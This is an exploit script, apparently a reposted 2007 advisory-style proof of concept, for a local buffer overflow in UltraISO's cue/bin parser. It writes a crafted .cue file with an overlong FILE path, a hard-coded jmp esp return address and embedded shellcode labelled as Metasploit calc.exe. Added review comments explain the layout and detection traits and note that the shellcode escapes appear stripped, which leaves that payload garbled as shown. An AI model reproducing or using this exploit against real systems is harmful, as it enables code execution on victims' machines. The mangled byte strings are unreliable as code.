
# Title : UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit 2
# Published : 2007-05-28
# Author : Thomas Pollet


#
#UltraISO exploit
#thomas . pollet @ gmail . com
#

import struct
# Payload embedded in the crafted cue sheet. The author's comment labels it as
# Metasploit-generated calc.exe shellcode; nothing in this file verifies that.
# NOTE(review): the backslashes of the "\x.." escapes appear to have been
# stripped by page extraction, so as shown each fragment is plain ASCII text
# ("xeb", "x03", ...) rather than the byte values the author intended.
scode=(#metasploit calc.exe shellcode
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x50x42x50x42x30x4bx58x45x54x4ex33x4bx38x4ex57"
"x45x30x4ax37x41x30x4fx4ex4bx58x4fx44x4ax41x4bx38"
"x4fx35x42x42x41x30x4bx4ex49x34x4bx58x46x33x4bx58"
"x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c"
"x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x30x45x47x45x4ex4bx48"
"x4fx35x46x32x41x50x4bx4ex48x36x4bx58x4ex50x4bx54"
"x4bx58x4fx35x4ex31x41x50x4bx4ex4bx38x4ex41x4bx38"
"x41x30x4bx4ex49x38x4ex45x46x52x46x50x43x4cx41x53"
"x42x4cx46x46x4bx48x42x44x42x43x45x38x42x4cx4ax37"
"x4ex50x4bx48x42x44x4ex50x4bx48x42x57x4ex51x4dx4a"
"x4bx48x4ax46x4ax30x4bx4ex49x30x4bx58x42x58x42x4b"
"x42x30x42x50x42x30x4bx48x4ax46x4ex43x4fx55x41x43"
"x48x4fx42x56x48x55x49x58x4ax4fx43x38x42x4cx4bx57"
"x42x55x4ax46x4fx4ex50x4cx42x4ex42x46x4ax36x4ax49"
"x50x4fx4cx48x50x30x47x35x4fx4fx47x4ex43x46x41x56"
"x4ex46x43x56x50x42x45x56x4ax37x45x36x42x30x5a"
)
# Build the cue sheet text. The quoted path of the FILE directive is padded
# with 1099 'B' characters; per the title this overruns a fixed-size filename
# buffer in UltraISO's cue parser (versions <= 8.6.2.2011 are named as
# affected). From a defender's side, the observable artifact is a .cue whose
# FILE path is over a kilobyte long -- the trait a scanner or a length check
# in a hardened parser would key on.
cue='FILE "'
cue+='B'*1099
#77f84143:       ff e4                   jmp    *%esp
#had to try a few to get a good one 
# Overwrites the saved return address with a hard-coded, little-endian packed
# absolute address of a "jmp esp" gadget. Being absolute, it is tied to one
# specific OS/DLL build (the author's note above says it was found by trial);
# address randomization or a non-executable stack would break this layout.
cue+=struct.pack('<L',0x77f84143)
# The payload is placed right after the return address so that, if the jmp esp
# gadget is reached, execution lands on it.
cue+=scode

# Close the quoted path and finish the cue sheet. NOTE(review): the trailing
# "n" in these literals is presumably a stripped "\n" line break.
cue+='.bin" BINARYn'
cue+=' TRACK 01 MODE1/2352n   INDEX 01 00:00:00'

# Write the cue sheet. Opened in text mode and never closed, so the data is
# only flushed when the interpreter exits.
cue_file = open("xpl.cue","w")
cue_file.write(cue)
# Creates an empty .bin alongside (nothing is ever written to it) -- presumably
# so the cue sheet's FILE reference resolves; this handle is never closed either.
bin_file = open("xpl.bin","w")
